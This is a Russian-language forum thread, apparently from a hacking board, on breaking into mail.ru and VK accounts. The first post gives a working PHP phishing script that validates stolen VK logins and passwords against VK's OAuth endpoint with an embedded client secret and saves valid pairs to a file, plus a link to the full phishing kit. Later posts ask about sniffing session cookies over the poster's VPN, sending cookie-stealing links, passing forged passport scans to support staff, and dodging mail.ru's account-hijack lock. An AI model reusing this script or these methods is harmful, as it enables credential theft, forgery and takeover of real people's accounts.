Помогите найти запрос на авторизацию mail.ru, пожалуйста. Нашел скрипт для фейка проверки правильности ввода логина с пассом для vk PHP: <?if($_POST['method']=='auth'){ if((empty($_POST['p'])) or (empty($_POST['l']))) exit('<div class="oauth_error">Указан неверный логин или пароль.</div>'); $r = file_get_contents('https://oauth.vk.com/token?grant_type=password&client_id=3140623&client_secret=VeWdmVclDCtn6ihuP1nt&username='.$_POST['l'].'&password='.$_POST['p']); $json = json_decode($r,1); if(empty($json['access_token'])) exit('<div class="oauth_error">Указан неверный логин или пароль.</div>'); file_put_contents('source.php',$_POST['l'].':'.$_POST['p']."\n",FILE_APPEND); exit("success");}elseif($_POST['method']=='clear') unlink('source.php');elseif($_POST['method']=='save'){var_dump(urldecode($_POST['accs']));/* unlink('source.php'); $fp = fopen("source.php", "w"); fwrite($fp, urldecode($_POST['accs'])); fclose($fp); */}?> Хочу узнать каким образом это можно сделать =) Вот весь фейк https://cloud.mail.ru/public/14bd6f1d4a2f/FAKE.rar
Я смотрю тут флудят по поводу взлома ) Чиркну и я на всякий пожарный. Нужно попасть на почту, пароль не нужен. Трафик идет через мой vpn. Можно как-нибудь заснифферить куки? Или же на почту кинуть ссылку с ворущим куки скриптом?
Приветствую всех=)Ребята,кто в курсе,как мыльник все таки проверяет паспорт на валидность?Случай- девушка знакомая вышла замуж ,10 числа сменила паспорт.Так ей тех.поддержка не восстановила доступ по прежнему скану с девичьей фамилией который еще был-говорят по данному документу мы не можем выслать вам пароль.Он недействителен. Сайт ФМС? и сканы с генератора при обработке дополнительной,для большей реальности картинки,вообще прокатывают когда- нибудь?
Товарищи,никто не знает в чем тут дело-привязал в почте майл.ру дополнительное мыло для восстановления пароля,потом пошел в форму восстановления и вариант через почту там отсутствует.Теперь привязки почты тоже что ли надо ждать как телефона? но про телефон это написано мелкими буквами в мыле,а про почту вообще ничего...Никто не в курсе в чем косяк?
такое дело, не работал давненько с почтами, тут взялся зайти на чужой mail.ru ящик и меня блочит мол Мы предполагаем, что ваш почтовый ящик был взломан. С целью защиты ваших данных, мы временно заблокировали доступ к ящику. как обойти? использовать российский носок/впн ?